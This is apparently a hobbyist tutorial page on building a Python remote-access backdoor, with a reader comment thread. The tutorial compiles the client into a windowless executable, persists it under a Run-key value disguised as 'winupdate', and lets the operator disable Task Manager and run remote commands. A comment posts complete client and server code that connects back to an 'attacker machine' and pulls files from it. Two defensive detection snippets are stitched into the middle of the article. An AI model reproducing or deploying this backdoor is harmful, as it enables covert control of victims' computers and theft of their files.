Simple Python Backdoor

Introduction: Simple Python Backdoor

About: Hello, my name is xp4xbox, a really old name that really has nothing to do with xbox consoles. Anyway I enjoy making programs and have several instructables on some of them. So far, I know VBScript, Batch, Pow…

So, almost a year after my instructable on the Simple Netcat Backdoor, I was inspired to create a similar but more feature-filled version using the Python programming language, simply because it's a fairly simple language compared to others. If you don't know what a backdoor is, it's basically a way to connect to and control someone's computer. This one has many advantages over the netcat one, such as a much simpler install and usage, and it is very easy to use outside of your network. I even included a remote cmd, so you can run any commands as before. Also, since the server is now cross-platform, you can accept connections on a Linux server.

Anyway you can download the latest version here (the only files you will need are the server and client).

NOTE: This program is still a bit of a work in progress; I hope to include a few more features in the future. This project is also available on the GitHub page.

Step 1: Installing Prerequisites...

Since this program is made in Python 3, go ahead and download the latest version from here. You will also need a few modules.

So to install them, you can simply run python -m pip install -r requirements.txt in a command prompt. The "requirements.txt" is the file in the main directory that contains all of the modules needed.

Step 2: Setup...

So to configure the client, open up src/client.py with IDLE or any other editor and you should see the code above as in pic 1.

Anyway, the first thing you need to do is configure the IP address to connect to, so set strHost to the IP that the client should connect to, as in pic 2. Or, if you plan to use the program with a DNS name such as one from no-ip, which allows you to use the program outside your network, remove the "#" on the line below and fill in your hostname between the quotes, e.g. myserver113.ddns.net.

NOTE: If you plan on using the program outside of your network, you must port forward port 3000. If you are using a server such as one from DigitalOcean, no port forwarding is required :).

Step 3: Build to .exe

In order to allow anyone without Python and the modules to run the file, you must build it to an .exe. To build, open up a command prompt and run the following command:

pyinstaller client.py --exclude-module FixTk --exclude-module tcl --exclude-module tk --exclude-module _tkinter --exclude-module tkinter --exclude-module Tkinter --onefile --windowed

What this does is exclude the unused tkinter module to save on file size and then creates a single executable.

NOTE: You can add your own icon by adding --icon="icon path"

Step 4: Usage...

Before you can run the server, you must disable your firewall or allow port 3000 in order to accept incoming connections. After that you can run the server to listen for connections.

Once you get a connection, you can type "--help", and you should get a prompt as in pic 1. Next you can interact with the user by typing "--i client id".

Next, you should see a menu appear as in pic 2, and now you can run any command you want such as "--m" to send a message, "--e" to open remote cmd, etc. You can also use "--b" so you can move the connection to the background and interact with another computer.

As I said, you can do anything you originally did with the netcat backdoor only more.

NOTE: It's always best to do a graceful shutdown by running "--x" in the main menu instead of closing the window.

Step 5: Uninstalling...

If you ever added this program to the startup and want to remove it, simply open up the registry and navigate to "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run". Then delete the value called "winupdate". I gave it a non-suspicious name so that it won't get deleted by accident ;).
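For anyone checking a machine for this startup entry, the following added example (not part of the original instructable or the project's code) parses the text output of reg query for the Run key and flags the "winupdate" value named above. The sample output, the paths in it and the user-writable-directory heuristic are constructed assumptions.

```python
import re

# Value name the article says the client registers under the HKCU Run key.
KNOWN_VALUE_NAMES = {"winupdate"}
# Assumption (not from the article): autoruns that launch from per-user
# writable locations deserve a second look. Legitimate software also does
# this, so treat it as a hint, not proof.
USER_WRITABLE_HINTS = ("\\appdata\\", "\\temp\\", "\\users\\public\\")

# `reg query` prints each value as: 4 spaces, name, 4 spaces, type, 4 spaces, data
ENTRY_RE = re.compile(r"^\s{4}(?P<name>.+?)\s{4}(?P<type>REG_\w+)\s{4}(?P<data>.*)$")

def parse_run_key(reg_query_output):
    """Return (name, type, data) tuples from `reg query` text output."""
    entries = []
    for line in reg_query_output.splitlines():
        m = ENTRY_RE.match(line)
        if m:
            entries.append((m["name"], m["type"], m["data"].strip()))
    return entries

def audit_run_key(reg_query_output):
    """Map each flagged value name to the list of reasons it was flagged."""
    findings = {}
    for name, _type, data in parse_run_key(reg_query_output):
        reasons = []
        if name.lower() in KNOWN_VALUE_NAMES:
            reasons.append("value name matches the article's startup entry")
        if any(hint in data.lower() for hint in USER_WRITABLE_HINTS):
            reasons.append("target is in a user-writable directory")
        if reasons:
            findings[name] = reasons
    return findings

# Constructed sample of:
#   reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Run"
SAMPLE = r"""
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
    SecurityHealth    REG_EXPAND_SZ    %windir%\system32\SecurityHealthSystray.exe
    winupdate    REG_SZ    C:\Users\alice\AppData\Roaming\client.exe
"""

if __name__ == "__main__":
    for value, why in audit_run_key(SAMPLE).items():
        print(value, "->", "; ".join(why))
```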

Step 6: Explanation...

So I could spend pages writing on how I made every feature, but instead I will explain generally how this entire program works.

The program works by first having a server listen on a port for incoming connections from the client; in this case I chose port 3000. Next, the client connects to the server using that port and then waits for the server to send it commands. In my case the commands are just simple strings of text such as "dtaskmgr", which tells the client to disable task manager. It's very simple actually. The server never communicates directly with the client's PC; instead it communicates with the client, which then runs the commands specified.

One more thing about sending data over a socket, is that the data must be sent as bytes which means you will see the server and the client constantly decoding the messages to standard text.

Anyway, that's pretty much all that goes into making a backdoor. You will notice I lightly commented the code, so if you know a little Python, it should be fairly easy to understand.
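Because the client dials out to port 3000 and the commands cross the wire as plain text, the traffic is easy to triage on the network side. The added example below (not code from the original instructable or the project) classifies connection records by port, direction and the one command string quoted above; the log format, addresses and payloads are constructed assumptions.

```python
import ipaddress

C2_PORT = 3000                   # port the article's server listens on
COMMAND_TOKENS = (b"dtaskmgr",)  # the one command string the article quotes
INTERNAL_NETS = [ipaddress.ip_network(n) for n in
                 ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]

def is_internal(addr):
    ip = ipaddress.ip_address(addr)
    return any(ip in net for net in INTERNAL_NETS)

def parse_record(line):
    """Parse 'src dst dport direction payload_hex' (constructed log format)."""
    src, dst, dport, direction, payload_hex = line.split()
    return {"src": src, "dst": dst, "dport": int(dport),
            "direction": direction, "payload": bytes.fromhex(payload_hex)}

def classify(record):
    """Return 'alert', 'review' or 'ok' for one connection record."""
    to_port = record["dport"] == C2_PORT and record["direction"] == "outbound"
    has_token = any(tok in record["payload"] for tok in COMMAND_TOKENS)
    if to_port and has_token:
        return "alert"    # port, direction and cleartext command all agree
    if to_port and not is_internal(record["dst"]):
        return "review"   # port 3000 alone is weak: ordinary services use it too
    return "ok"

def triage(log_text):
    """Map (src, dst) to a verdict for every record in the log text."""
    verdicts = {}
    for line in log_text.strip().splitlines():
        if line and not line.startswith("#"):
            rec = parse_record(line)
            verdicts[(rec["src"], rec["dst"])] = classify(rec)
    return verdicts

SAMPLE_LOG = """
# src dst dport direction first_server_payload_hex   (constructed sample data)
10.0.0.21 203.0.113.50 3000 outbound 647461736b6d6772
10.0.0.22 198.51.100.7 3000 outbound 485454502f312e3120323030
10.0.0.23 10.0.0.5 3000 outbound 485454502f312e31
10.0.0.24 203.0.113.50 443 outbound 160303
"""

if __name__ == "__main__":
    for pair, verdict in triage(SAMPLE_LOG).items():
        print(pair, verdict)
```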

Step 7: Done!

Have fun with this program! It can be especially helpful for helping friends/relatives who do not live close by.

I hope you found this instructable useful and if you have any questions, or concerns please leave a comment or pm me.

Also, if you find any bugs in this program, or feel a feature is missing or would be useful to include, please report it to me.

Please use this program responsibly and legally, I am not responsible for anything you do.

Participated in the Wireless Contest

    28 Comments

    0
    xp4xbox
    xp4xbox

    2 months ago

    Please check Github for the latest version with an easier setup.

    0
    bhuvanalwaysrock
    bhuvanalwaysrock

    Question 5 months ago on Step 7

    I AM GETTING THIS ERROR PLEASE RESOLVE! IF THE ADMIN OF THIS PROJECT WANNA CONTACT ME , THEN I HAVE MESSAGED YOU MY GMAIL ACCOUNT! AND IF AN OTHER CAN RESOLVE MY PROBLEM THEN PLZZ DO IT! THIS ERROR COMES WHEN I OPEN MY CLIENT.EXE

    0
    xp4xbox
    xp4xbox

    Reply 2 months ago

    Open an issue on the GitHub page.

    0
    safiullah176
    safiullah176

    3 months ago

    Hey,
    i have a problem with --r and --s
    please give me one example , how to use these two tools

    how to put a command for target file and output file,
    this backdoor working perfectly
    thank you

    0
    xp4xbox
    xp4xbox

    Reply 2 months ago

    Target file is the path of the file you want
    Output file is the path of the file that will be transferred

    0
    safiullah176
    safiullah176

    Reply 3 months ago

    Finally, changing directory is working, but I am facing problems with upload and download of files; kindly check the attached files.
    Sometimes upload and download are done but show in an unknown format.

    0
    glasmor05
    glasmor05

    7 months ago

    Hey,
    I got a lot of questions for you.
    First one to see if you reply is.
    Can you take a look at my backdoor (these are just 80 lines of code in server and backdoor)? If you are interested, pls reply, then I'll send you the code.

    0
    xp4xbox
    xp4xbox

    Reply 7 months ago

    sure

    0
    glasmor05
    glasmor05

    Reply 7 months ago

    If u have Discord pls add me there .
    Vuki#4555

    0
    glasmor05
    glasmor05

    Reply 7 months ago

    Backdoor:

    import socket
    import subprocess
    import os
    # Provide IP address of attacker machine
    ip="0.0.0.0"
    port=8080
    s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
    s.setsockopt(socket.SOL_SOCKET,socket.SO_REUSEADDR,1)
    s.connect((ip,port))
    while True:
    command=s.recv(1024)
    if command == b'exit':
    s.close()
    break

    elif command==b'Startapp':
    App = s.recv(1024)
    App = App.decode()
    os.startfile(App)

    elif command == b'download':
    file_path = s.recv(5000)
    file_path = file_path.decode()
    file = open(file_path,"rb")
    data = file.read()
    s.send(data)
    print("")
    print("File has been sent succsesfully ...")
    print("")

    elif command == b'send_files':
    filename = s.recv(6000)
    print(filename)
    new_file = open(filename, "wb")
    data = s.recv(6000)
    print(data)
    new_file.write(data)
    new_file.close()

    elif command == b'viewcwd':
    files = os.getcwd()
    files = str(files)
    s.send(files.encode())
    print("")
    print("Command has been executed ...")
    print("")

    else:
    print("")
    print("Command not in List !")
    print("")
    0
    glasmor05
    glasmor05

    Reply 7 months ago

    Server :
    #server
    import os
    import socket
    ip="0.0.0.0"
    port=8080
    s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
    s.setsockopt(socket.SOL_SOCKET,socket.SO_REUSEADDR,1)
    s.bind((ip,port))
    s.listen(1)
    conn,addr=s.accept()
    print('[+]Connected to',addr)
    while True:
    command=input("Shell>>")
    if command=='exit':
    conn.send(b'exit')
    conn.close()
    break

    elif command=='Startapp':
    conn.send(b'Startapp')
    App = input(str("Enter App name or Website link : "))
    conn.send(App.encode())
    print("")
    print("Command executet successfully ... ")
    print("")

    elif command=='download':
    conn.send(b'download')
    filepath = input(str("Please enter the right filepath with filename : "))
    conn.send(filepath.encode())
    file = conn.recv(100000)
    filename = input(str("Please enter filname for the incoming file : "))
    new_file = open(filename,"wb")
    new_file.write(file)
    new_file.close
    print("")
    print(filename,"File has been downloaded and saved")
    print("")

    elif command == 'send_files':
    conn.send(b'send_files')
    file = input(str("Please enter the filename and directory : "))
    filename = input(str("Please enetr the file name and directory where the file should be saved: "))
    data = open(file, "rb")
    file_data = data.read(7000)
    conn.send(filename.encode())
    print("")
    print("File has been sent succsessfully ...")
    conn.send(file_data)

    elif command == 'help':
    print("---All availible commands---")
    print("")
    print("help, download, send_files, Startapp, exit")
    print("")
    print("---More commands comming soon---")

    elif command == 'viewcwd':
    conn.send(b'viewcwd')
    print("")
    print("Command sent waiting for execution ...")
    print("")
    files = conn.recv(5000)
    files = files.decode()
    print("Command output : ",files)

    else:
    print("")
    print("Command not in List !")
    print("")
    0
    SHEEPHEAD72
    SHEEPHEAD72

    1 year ago

    Hello, I am having a problem with uploading, downloading and going through directories. For example, when I put in a directory that is 100% right, it just pauses and then says failed to execute script on the victim's computer. Also, when I download and upload, it seems to work, but it just pauses on 'sent' and it never sends.

    0
    xp4xbox
    xp4xbox

    Reply 1 year ago

    Seems to be a common problem. I'm not sure how to fix it; I have never experienced it. Do you experience it when using remote cmd? You should, if I am correct.

    0
    jvnh723
    jvnh723

    1 year ago on Step 7

    ERROR: Could not find a version that satisfies the requirement pywin32 (from -r requirements.txt (line 1)) (from versions: none)
    ERROR: No matching distribution found for pywin32 (from -r requirements.txt (li

    That's the error that it shows

    0
    xp4xbox
    xp4xbox

    Reply 1 year ago

    Use python v 3.6

    0
    harold.r.e.sinkins
    harold.r.e.sinkins

    2 years ago

    Dear xp4xbox,

    I've been studying the Python the Hard Way book, which has been good so far, and I saw your code and wanted to give it a go, but I'm getting no response. I've shut off my firewall and opened port 3000, but when I put in

    --e
    I get this response
    Invalid choice, please try again!
    --help
    --l List all connections
    --i Interact with connection
    --e Open remote cmd with connection
    --s Send command to every connection
    --c Close connection
    --x Exit and close all connections
    I get the same response for every one. Can you help please?

    0
    xp4xbox
    xp4xbox

    Reply 2 years ago

    You have to add the ID for the client you want to connect to.

    eg. --e 0

    for the first client.

    --e 1

    for the second....

    0
    CarminB
    CarminB

    2 years ago

    Won't run on W10? Any suggestions?

    0
    xp4xbox
    xp4xbox

    Reply 2 years ago

    I'm not sure, it works for me.